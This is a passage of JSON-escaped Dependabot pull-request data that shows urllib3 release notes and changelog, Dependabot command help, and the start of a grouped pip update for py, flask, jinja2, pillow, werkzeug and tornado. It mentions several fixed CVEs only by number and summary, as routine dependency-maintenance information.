\u003ca href=\"https://github.com/urllib3/urllib3/releases\"\u003eurllib3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.5.0\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch1\u003eSecurity issues\u003c/h1\u003e\n\u003cp\u003eurllib3 2.5.0 fixes two moderate security issues:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ePool managers now properly control redirects when \u003ccode\u003eretries\u003c/code\u003e is passed — CVE-2025-50181 reported by \u003ca href=\"https://github.com/sandumjacob\"\u003e\u003ccode\u003e@​sandumjacob\u003c/code\u003e\u003c/a\u003e (5.3 Medium, GHSA-pq67-6m6q-mj2v)\u003c/li\u003e\n\u003cli\u003eRedirects are now controlled by urllib3 in the Node.js runtime — CVE-2025-50182 (5.3 Medium, GHSA-48p4-8xcf-vxj5)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for the \u003ccode\u003ecompression.zstd\u003c/code\u003e module that is new in Python 3.14. See \u003ca href=\"https://peps.python.org/pep-0784/\"\u003ePEP 784\u003c/a\u003e for more information. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3610\"\u003e#3610\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdded support for version 0.5 of \u003ccode\u003ehatch-vcs\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3612\"\u003e#3612\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eRaised exception for \u003ccode\u003eHTTPResponse.shutdown\u003c/code\u003e on a connection already released to the pool. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3581\"\u003e#3581\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed incorrect \u003ccode\u003eCONNECT\u003c/code\u003e statement when using an IPv6 proxy with \u003ccode\u003econnection_from_host\u003c/code\u003e. Previously would not be wrapped in \u003ccode\u003e[]\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3615\"\u003e#3615\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.4.0\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eApplied PEP 639 by specifying the license fields in pyproject.toml. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3522\"\u003e#3522\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdated exceptions to save and restore more properties during the pickle/serialization process. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3567\"\u003e#3567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003everify_flags\u003c/code\u003e option to \u003ccode\u003ecreate_urllib3_context\u003c/code\u003e with a default of \u003ccode\u003eVERIFY_X509_PARTIAL_CHAIN\u003c/code\u003e and \u003ccode\u003eVERIFY_X509_STRICT\u003c/code\u003e for Python 3.13+. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3571\"\u003e#3571\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug with partial reads of streaming data in Emscripten. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3555\"\u003e#3555\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eMisc\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSwitched to uv for installing development dependecies. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3550\"\u003e#3550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003emultiple.intoto.jsonl\u003c/code\u003e asset from GitHub releases. Attestation of release files since v2.3.0 can be found on PyPI. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3566\"\u003e#3566\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.3.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/blob/main/CHANGES.rst\"\u003eurllib3's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e2.5.0 (2025-06-18)\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for the \u003ccode\u003ecompression.zstd\u003c/code\u003e module that is new in Python 3.14.\nSee \u003ccode\u003ePEP 784 \u0026lt;https://peps.python.org/pep-0784/\u0026gt;\u003c/code\u003e_ for more information. (\u003ccode\u003e[#3610](https://github.com/urllib3/urllib3/issues/3610) \u0026lt;https://github.com/urllib3/urllib3/issues/3610\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eAdded support for version 0.5 of \u003ccode\u003ehatch-vcs\u003c/code\u003e (\u003ccode\u003e[#3612](https://github.com/urllib3/urllib3/issues/3612) \u0026lt;https://github.com/urllib3/urllib3/issues/3612\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a security issue where restricting the maximum number of followed\nredirects at the \u003ccode\u003eurllib3.PoolManager\u003c/code\u003e level via the \u003ccode\u003eretries\u003c/code\u003e parameter\ndid not work.\u003c/li\u003e\n\u003cli\u003eMade the Node.js runtime respect redirect parameters such as \u003ccode\u003eretries\u003c/code\u003e\nand \u003ccode\u003eredirects\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eRaised exception for \u003ccode\u003eHTTPResponse.shutdown\u003c/code\u003e on a connection already released to the pool. (\u003ccode\u003e[#3581](https://github.com/urllib3/urllib3/issues/3581) \u0026lt;https://github.com/urllib3/urllib3/issues/3581\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eFixed incorrect \u003ccode\u003eCONNECT\u003c/code\u003e statement when using an IPv6 proxy with \u003ccode\u003econnection_from_host\u003c/code\u003e. Previously would not be wrapped in \u003ccode\u003e[]\u003c/code\u003e. (\u003ccode\u003e[#3615](https://github.com/urllib3/urllib3/issues/3615) \u0026lt;https://github.com/urllib3/urllib3/issues/3615\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e2.4.0 (2025-04-10)\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApplied PEP 639 by specifying the license fields in pyproject.toml. (\u003ccode\u003e[#3522](https://github.com/urllib3/urllib3/issues/3522) \u0026lt;https://github.com/urllib3/urllib3/issues/3522\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eUpdated exceptions to save and restore more properties during the pickle/serialization process. (\u003ccode\u003e[#3567](https://github.com/urllib3/urllib3/issues/3567) \u0026lt;https://github.com/urllib3/urllib3/issues/3567\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003everify_flags\u003c/code\u003e option to \u003ccode\u003ecreate_urllib3_context\u003c/code\u003e with a default of \u003ccode\u003eVERIFY_X509_PARTIAL_CHAIN\u003c/code\u003e and \u003ccode\u003eVERIFY_X509_STRICT\u003c/code\u003e for Python 3.13+. (\u003ccode\u003e[#3571](https://github.com/urllib3/urllib3/issues/3571) \u0026lt;https://github.com/urllib3/urllib3/issues/3571\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug with partial reads of streaming data in Emscripten. (\u003ccode\u003e[#3555](https://github.com/urllib3/urllib3/issues/3555) \u0026lt;https://github.com/urllib3/urllib3/issues/3555\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eMisc\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSwitched to uv for installing development dependecies. (\u003ccode\u003e[#3550](https://github.com/urllib3/urllib3/issues/3550) \u0026lt;https://github.com/urllib3/urllib3/issues/3550\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003emultiple.intoto.jsonl\u003c/code\u003e asset from GitHub releases. Attestation of release files since v2.3.0 can be found on PyPI. (\u003ccode\u003e[#3566](https://github.com/urllib3/urllib3/issues/3566) \u0026lt;https://github.com/urllib3/urllib3/issues/3566\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e2.3.0 (2024-12-22)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/aaab4eccc10c965897540b21e15f11859d0b62e7\"\u003e\u003ccode\u003eaaab4ec\u003c/code\u003e\u003c/a\u003e Release 2.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/7eb4a2aafe49a279c29b6d1f0ed0f42e9736194f\"\u003e\u003ccode\u003e7eb4a2a\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/f05b1329126d5be6de501f9d1e3e36738bc08857\"\u003e\u003ccode\u003ef05b132\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/d03fe327a71d09728512217149f269763671f296\"\u003e\u003ccode\u003ed03fe32\u003c/code\u003e\u003c/a\u003e Fix HTTP tunneling with IPv6 in older Python versions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/11661e9bb4278e43d081f47a516e287a928c2206\"\u003e\u003ccode\u003e11661e9\u003c/code\u003e\u003c/a\u003e Bump github/codeql-action from 3.28.0 to 3.29.0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3624\"\u003e#3624\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/6a0ecc6b16fe30f721021b44a81d19615098c71e\"\u003e\u003ccode\u003e6a0ecc6\u003c/code\u003e\u003c/a\u003e Update v2 migration guide to 2.4.0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3621\"\u003e#3621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/8e32e60d9024c05bc6f7adda08bdf6c539d0b0d4\"\u003e\u003ccode\u003e8e32e60\u003c/code\u003e\u003c/a\u003e Raise exception for shutdown on a connection already released to the pool (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3\"\u003e#3\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/9996e0fbf90b77083ad3c73737a6c6395703faa9\"\u003e\u003ccode\u003e9996e0f\u003c/code\u003e\u003c/a\u003e Fix emscripten CI for Chrome 137+ (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3599\"\u003e#3599\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/4fd1a99a59725faf0efc946ce3b6bc9a194420af\"\u003e\u003ccode\u003e4fd1a99\u003c/code\u003e\u003c/a\u003e Bump RECENT_DATE (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3617\"\u003e#3617\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/c4b5917e911a90c8bf279448df8952a682294135\"\u003e\u003ccode\u003ec4b5917\u003c/code\u003e\u003c/a\u003e Add support for the new \u003ccode\u003ecompression.zstd\u003c/code\u003e module in Python 3.14 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3611\"\u003e#3611\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/urllib3/urllib3/compare/1.26.19...2.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/Melissa-Forbs/solana-program-library/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/Melissa-Forbs/solana-program-library/pull/1648","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Melissa-Forbs%2Fsolana-program-library/issues/1648","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1648/packages"},{"uuid":"2693553824","node_id":"PR_kwDOAmd4As6gjF6g","number":1,"state":"open","title":"Bump the pip group across 1 directory with 6 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-07-25T01:02:07.000Z","updated_at":"2025-07-25T01:02:08.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":6,"packages":[{"name":"py","old_version":"1.4.9","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"flask","old_version":"0.9","new_version":"2.2.5","repository_url":"https://github.com/pallets/flask"},{"name":"jinja2","old_version":"2.6","new_version":"3.1.6","repository_url":"https://github.com/pallets/jinja"},{"name":"pillow","old_version":"1.7.7","new_version":"10.3.0","repository_url":"https://github.com/python-pillow/Pillow"},{"name":"werkzeug","old_version":"0.8.3","new_version":"3.0.6","repository_url":"https://github.com/pallets/werkzeug"},{"name":"tornado","old_version":"2.3","new_version":"6.5","repository_url":"https://github.com/tornadoweb/tornado"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 6 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [py](https://github.com/pytest-dev/py) | `1.4.9` | `1.11.0` |\n| [flask](https://github.com/pallets/flask) | `0.9` | `2.2.5` |\n| [jinja2](https://github.com/pallets/jinja) | `2.6` | `3.1.6` |\n| [pillow](https://github.com/python-pillow/Pillow) | `1.7.7` | `10.3.0` |\n| [werkzeug](https://github.com/pallets/werkzeug) | `0.8.3` | `3.0.6` |\n| [tornado](https://github.com/tornadoweb/tornado) | `2.3` | `6.5` |\n\n\nUpdates `py` from 1.4.9 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.10.0 (2020-12-12)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix a regular expression DoS vulnerability in the py.path.svnwc SVN blame functionality (CVE-2020-29651)\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.4 =\u0026gt; 1.5\u003c/li\u003e\n\u003cli\u003eUpdate vendored iniconfig: 1.0.0 =\u0026gt; 1.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.9.0 (2020-06-24)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd type annotation stubs for the following modules:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epy.error\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.iniconfig\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.path\u003c/code\u003e (not including SVN paths)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.io\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.xml\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThere are no plans to type other modules at this time.\u003c/p\u003e\n\u003cp\u003eThe type annotations are provided in external .pyi files, not inline in the\ncode, and may therefore contain small errors or omissions. If you use \u003ccode\u003epy\u003c/code\u003e\nin conjunction with a type checker, and encounter any type errors you believe\nshould be accepted, please report it in an issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.2 (2020-06-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eOn Windows, \u003ccode\u003epy.path.local\u003c/code\u003es which differ only in case now have the same\nPython hash value. Previously, such paths were considered equal but had\ndifferent hashes, which is not allowed and breaks the assumptions made by\ndicts, sets and other users of hashes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.1 (2019-12-27)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eHandle \u003ccode\u003eFileNotFoundError\u003c/code\u003e when trying to import pathlib in \u003ccode\u003epath.common\u003c/code\u003e\non Python 3.4 (\u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/207\"\u003e#207\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003epy.path.local.samefile\u003c/code\u003e now works correctly in Python 3 on Windows when dealing with symlinks.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.0 (2019-02-21)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.4.9...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flask` from 0.9 to 2.2.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/flask/releases\"\u003eflask's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.2.5\u003c/h2\u003e\n\u003cp\u003eThis is a security fix release for the 2.2.x release branch. Note that 2.3.x is the currently supported release branch; please upgrade to the latest version if possible.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity advisory: \u003ca href=\"https://github.com/pallets/flask/security/advisories/GHSA-m2qf-hxjv-5gpq\"\u003ehttps://github.com/pallets/flask/security/advisories/GHSA-m2qf-hxjv-5gpq\u003c/a\u003e, CVE-2023-30861\u003c/li\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-5\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-5\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/30?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/30?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.4\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 2.2.x release branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-4\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-4\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/27?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/27?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 2.2.x release branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-3\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-3\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/26?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/26?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.2\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.2.0\"\u003e2.2.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-2\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/25?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/25?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.1\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.2.0\"\u003e2.2.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-1\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-1\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/23?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/23?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.0\u003c/h2\u003e\n\u003cp\u003eThis is a feature release, which includes new features and removes previously deprecated code. The 2.2.x branch is now the supported bug fix branch, the 2.1.x branch will become a tag marking the end of support for that branch. We encourage everyone to upgrade, and to use a tool such as \u003ca href=\"https://pypi.org/project/pip-tools/\"\u003epip-tools\u003c/a\u003e to pin all dependencies and control upgrades.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-0\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-0\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/19?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/19?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca 